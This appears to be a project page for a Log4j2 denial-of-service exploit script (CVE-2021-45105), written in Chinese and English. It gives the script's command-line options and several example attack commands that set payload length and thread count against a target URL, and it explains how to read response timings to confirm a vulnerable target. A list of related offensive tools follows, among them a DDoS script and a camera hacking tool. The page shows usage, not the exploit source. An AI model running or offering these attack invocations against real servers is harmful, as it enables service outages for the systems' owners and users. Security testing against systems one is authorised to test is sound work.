log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc

Last update: Aug 13, 2022

Overview

说明 about

author: 我超怕的

blog: https://www.cnblogs.com/iAmSoScArEd/

github: https://github.com/iAmSOScArEd/

date: 2021-12-20

log4j2 dos exploit

log4j2 dos 漏洞利用脚本

CVE-2021-45105 Exploit

CVE-2021-45105 利用脚本

利用方式 how to use

English：

Log4j2_dos.py -u <url> -m <method> -d <params> -H <header> -l <loop> -t <thread>

-u,--url    	 attack target
-m,--method    http method, only get and post. default is get.
-d,--data   	 get or post params, json format like:{\"username\":\"\"}
-H,--header    request header, json format like:{\"user-agent\":\"\"}
-l,--loop    	 payload loop times (or length),default 100.it is determine where is the params, example get param max length or post param max length or request header max length
-t,--thread    attack thread. default is 0, just request once.

usage:
Log4j2_dos.py -u http://url.com/ -d {\"username\":\"\"}
Log4j2_dos.py -u http://url.com/ -d {\"username\":\"\"} -l 500 -t 100
Log4j2_dos.py -u http://url.com/ -m post -d {\"username\":\"\"} -l 500
Log4j2_dos.py -u http://url.com/ -m post -H {\"user-agent\":\"\"} -l 500 -t 100
Log4j2_dos.py -u http://url.com/ -m post -d {\"username\":\"\"} -H {\"user-agent\":\"\"} -l 500

Output format：

[+] normal time:0.11111

[+] attack time:2.00000

if attack time -normal time>1 or something，it maybe exist vulnerability，can use -t param set attack thread.

中文：

 Log4j2_dos.py -u <url> -m <method> -d <params> -H <header> -l <loop> -t <thread>
 
-u,--url   		 攻击目标
-m,--method    默认为get，http方式，仅支持get和post
-d,--data   	 get或post请求参数，json格式，如：{\"username\":\"\"}
-H,--header    请求头, json格式， 如：{\"user-agent\":\"\"}
-l,--loop    	 默认为100，payload循环长度,根据参数在不同的位置，设置不同的数值，如请求头最大允许长度、get最大长度、post最大长度
-t,--thread    默认为0,表示仅请求一次，攻击线程.。

输出格式：

[+] normal time:0.11111

[+] attack time:2.00000

如果attack time延迟很大，说明漏洞存在，可以利用-t参数设置攻击线程

免责声明

请勿用于非法用途，仅供学习参考。任何违法行为与本人无关。

蹩脚英语，没用翻译，将就看。

By：我超怕的

log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc

Related tags

Overview

说明 about

利用方式 how to use

English：

中文：

免责声明

Owner

OpenPort scanner GUI tool (CNMAP)

logmap: Log4j2 jndi injection fuzz tool

An interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.

Collection Of Discord Hacking Tools / Fun Stuff / Exploits That Is Completely Made Using Python.

Tool for finding PHP source code vulnerabilities.

SeaSurf is a Flask extension for preventing cross-site request forgery (CSRF).

CVE-2021-22205& GitLab CE/EE RCE

Exploiting CVE-2021-44228 in vCenter for remote code execution and more

the metasploit script(POC/EXP) about CVE-2021-22005 VMware vCenter Server contains an arbitrary file upload vulnerability

Exploit for CVE-2017-17562 vulnerability, that allows RCE on GoAhead (< v3.6.5) if the CGI is enabled and a CGI program is dynamically linked.

Kriecher is a simple Web Scanner which will run it's own checks for the OWASP

Consolidating and extending hosts files from several well-curated sources. You can optionally pick extensions to block pornography, social media, and other categories.

Malware Configuration And Payload Extraction

A simple python script for hosting a Snowflake Proxy in your python program or with it's standalone cli

Hammer-DDos - Hammer DDos With Python

neo Tool is great one in binary exploitation topic

PrivateRoom - Make your work private by building a system using arduino which instantly kills a program when someone enters your room/cabin

A tool for making python source difficult to read.

Brainly-Scrambler - Brainly Scrambler With Python

CC CAMERA HACKING TOOL